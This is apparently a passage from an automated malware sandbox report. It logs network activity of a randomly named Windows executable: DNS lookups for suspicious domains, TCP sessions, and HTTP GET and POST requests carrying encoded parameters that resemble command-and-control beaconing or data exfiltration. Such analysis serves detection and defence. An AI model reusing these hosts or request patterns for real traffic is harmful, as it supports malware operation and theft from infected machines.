                                                      Nov 24, 2024 08:14:35.517010927 CET8049989185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:35.517067909 CET4998980192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:35.704514980 CET4998980192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:36.723464012 CET4999080192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:36.843020916 CET8049990185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:36.843162060 CET4999080192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:36.852869034 CET4999080192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:36.972413063 CET8049990185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:38.188205957 CET8049990185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:38.188271046 CET8049990185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:38.188508034 CET4999080192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:38.191446066 CET4999080192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:38.310792923 CET8049990185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:43.883008003 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:44.002588034 CET8049991172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:44.002674103 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:44.018094063 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:44.137654066 CET8049991172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:45.532572031 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:45.606446981 CET8049991172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:45.606774092 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:45.607377052 CET8049991172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:45.607435942 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:45.653824091 CET8049991172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:45.653947115 CET4999180192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:46.551604986 CET4999280192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:46.671178102 CET8049992172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:46.671272039 CET4999280192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:46.687326908 CET4999280192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:46.806967974 CET8049992172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:47.949179888 CET8049992172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:47.949549913 CET8049992172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:47.949609995 CET4999280192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:48.188869953 CET4999280192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:49.209075928 CET4999380192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:49.328721046 CET8049993172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:49.328805923 CET4999380192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:49.344791889 CET4999380192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:49.465385914 CET8049993172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:49.465661049 CET8049993172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:50.600850105 CET8049993172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:50.602277040 CET8049993172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:50.602328062 CET4999380192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:50.860692978 CET4999380192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:51.879738092 CET4999480192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:51.999305010 CET8049994172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:51.999526978 CET4999480192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:52.015127897 CET4999480192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:52.134583950 CET8049994172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:53.272583961 CET8049994172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:53.273127079 CET8049994172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:53.273536921 CET4999480192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:53.275861025 CET4999480192.168.2.9172.67.145.234
                                                      Nov 24, 2024 08:14:53.395442009 CET8049994172.67.145.234192.168.2.9
                                                      Nov 24, 2024 08:14:58.700084925 CET4999580192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:14:58.819612980 CET8049995172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:14:58.819741964 CET4999580192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:14:58.839129925 CET4999580192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:14:58.958873034 CET8049995172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:00.279894114 CET8049995172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:00.280905008 CET8049995172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:00.280976057 CET4999580192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:00.345240116 CET4999580192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:01.364162922 CET4999680192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:01.483867884 CET8049996172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:01.484005928 CET4999680192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:01.499948978 CET4999680192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:01.619636059 CET8049996172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:02.944839954 CET8049996172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:02.945843935 CET8049996172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:02.945877075 CET8049996172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:02.945909977 CET4999680192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:02.945986986 CET4999680192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:03.001456022 CET4999680192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:04.020622969 CET4999780192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:04.140381098 CET8049997172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:04.140531063 CET4999780192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:04.156848907 CET4999780192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:04.276498079 CET8049997172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:04.276544094 CET8049997172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:05.598087072 CET8049997172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:05.598788977 CET8049997172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:05.598869085 CET4999780192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:05.673258066 CET4999780192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:06.692497969 CET4999880192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:06.812184095 CET8049998172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:06.812366962 CET4999880192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:06.822534084 CET4999880192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:06.942158937 CET8049998172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:08.315754890 CET8049998172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:08.315963030 CET8049998172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:08.316037893 CET4999880192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:08.319727898 CET4999880192.168.2.9172.67.167.146
                                                      Nov 24, 2024 08:15:08.440362930 CET8049998172.67.167.146192.168.2.9
                                                      Nov 24, 2024 08:15:13.888488054 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:14.008428097 CET8049999154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:14.008604050 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:14.023761034 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:14.143332958 CET8049999154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:15.532546997 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:15.568288088 CET8049999154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:15.568409920 CET8049999154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:15.568443060 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:15.568528891 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:15.652158976 CET8049999154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:15.652333021 CET4999980192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:16.551199913 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:16.670695066 CET8050000154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:16.670808077 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:16.686587095 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:16.806245089 CET8050000154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:18.188878059 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:18.193378925 CET8050000154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:18.193469048 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:18.193573952 CET8050000154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:18.193619013 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:18.308435917 CET8050000154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:18.308511972 CET5000080192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:19.207947016 CET5000180192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:19.327668905 CET8050001154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:19.327816010 CET5000180192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:19.355782986 CET5000180192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:19.475394011 CET8050001154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:19.475423098 CET8050001154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:20.860836983 CET5000180192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:20.980920076 CET8050001154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:20.981066942 CET5000180192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:21.879522085 CET5000280192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:21.999100924 CET8050002154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:21.999238968 CET5000280192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:22.009342909 CET5000280192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:22.130098104 CET8050002154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:23.516329050 CET8050002154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:23.516442060 CET8050002154.88.22.110192.168.2.9
                                                      Nov 24, 2024 08:15:23.516536951 CET5000280192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:23.519629002 CET5000280192.168.2.9154.88.22.110
                                                      Nov 24, 2024 08:15:23.639075041 CET8050002154.88.22.110192.168.2.9
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 24, 2024 08:13:03.278503895 CET5898053192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:13:03.884412050 CET53589801.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:13:20.411982059 CET4960553192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:13:21.408365011 CET4960553192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:13:21.585680962 CET53496051.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:13:21.585761070 CET53496051.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:13:36.271307945 CET6293153192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:13:37.267025948 CET6293153192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:13:37.313338995 CET53629311.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:13:37.404433966 CET53629311.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:14:12.412153959 CET5792253192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:14:13.407731056 CET5792253192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:14:13.574248075 CET53579221.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:14:13.574270010 CET53579221.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:14:28.146013975 CET5916253192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:14:28.733688116 CET53591621.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:14:43.210772038 CET5229253192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:14:43.880153894 CET53522921.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:14:58.286355019 CET5468553192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:14:58.697288990 CET53546851.1.1.1192.168.2.9
                                                      Nov 24, 2024 08:15:13.333672047 CET5348253192.168.2.91.1.1.1
                                                      Nov 24, 2024 08:15:13.885879040 CET53534821.1.1.1192.168.2.9
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 24, 2024 08:13:03.278503895 CET192.168.2.91.1.1.10x1ee6Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:20.411982059 CET192.168.2.91.1.1.10x4d33Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.408365011 CET192.168.2.91.1.1.10x4d33Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:36.271307945 CET192.168.2.91.1.1.10x5a3aStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:37.267025948 CET192.168.2.91.1.1.10x5a3aStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:12.412153959 CET192.168.2.91.1.1.10x32e2Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.407731056 CET192.168.2.91.1.1.10x32e2Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:28.146013975 CET192.168.2.91.1.1.10xd80eStandard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:43.210772038 CET192.168.2.91.1.1.10x920fStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:58.286355019 CET192.168.2.91.1.1.10xaea7Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:15:13.333672047 CET192.168.2.91.1.1.10x357aStandard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 24, 2024 08:12:19.453407049 CET1.1.1.1192.168.2.90xe26aNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:12:19.453407049 CET1.1.1.1192.168.2.90xe26aNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:03.884412050 CET1.1.1.1192.168.2.90x1ee6No error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585680962 CET1.1.1.1192.168.2.90x4d33No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585680962 CET1.1.1.1192.168.2.90x4d33No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585680962 CET1.1.1.1192.168.2.90x4d33No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585680962 CET1.1.1.1192.168.2.90x4d33No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585761070 CET1.1.1.1192.168.2.90x4d33No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585761070 CET1.1.1.1192.168.2.90x4d33No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585761070 CET1.1.1.1192.168.2.90x4d33No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:21.585761070 CET1.1.1.1192.168.2.90x4d33No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:37.313338995 CET1.1.1.1192.168.2.90x5a3aNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:13:37.404433966 CET1.1.1.1192.168.2.90x5a3aNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.574248075 CET1.1.1.1192.168.2.90x32e2No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.574248075 CET1.1.1.1192.168.2.90x32e2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.574248075 CET1.1.1.1192.168.2.90x32e2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.574270010 CET1.1.1.1192.168.2.90x32e2No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.574270010 CET1.1.1.1192.168.2.90x32e2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 24, 2024 08:14:13.574270010 CET1.1.1.1192.168.2.90x32e2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:28.733688116 CET1.1.1.1192.168.2.90xd80eNo error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:43.880153894 CET1.1.1.1192.168.2.90x920fNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:43.880153894 CET1.1.1.1192.168.2.90x920fNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:58.697288990 CET1.1.1.1192.168.2.90xaea7No error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:14:58.697288990 CET1.1.1.1192.168.2.90xaea7No error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                      Nov 24, 2024 08:15:13.885879040 CET1.1.1.1192.168.2.90x357aNo error (0)www.t91rl7.pro154.88.22.110A (IP address)IN (0x0001)false
                                                      • www.nb-shenshi.buzz
                                                      • www.laohub10.net
                                                      • www.xcvbj.asia
                                                      • www.soainsaat.xyz
                                                      • www.amayavp.xyz
                                                      • www.vayui.top
                                                      • www.rgenerousrs.store
                                                      • www.t91rl7.pro
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.949803161.97.168.245801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:04.023580074 CET481OUTGET /xxr1/?6vSXrZxp=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM6q1x7MLoHRo8pv4eG/wGdJUiKAzPmFA==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.nb-shenshi.buzz
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:13:05.360497952 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:13:05 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 2966
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      ETag: "66cd104a-b96"
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                      Nov 24, 2024 08:13:05.360518932 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                      Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                      Nov 24, 2024 08:13:05.360529900 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                      Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.94984527.124.4.246801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:21.728193998 CET744OUTPOST /sgdd/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/sgdd/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 66 35 37 46 62 46 45 66 38 74 77 54 55 53 32 38 76 69 32 69 35 52 7a 32 74 61 6d 2f
                                                      Data Ascii: 6vSXrZxp=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLf57FbFEf8twTUS28vi2i5Rz2tam/
                                                      Nov 24, 2024 08:13:23.145857096 CET525INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 350
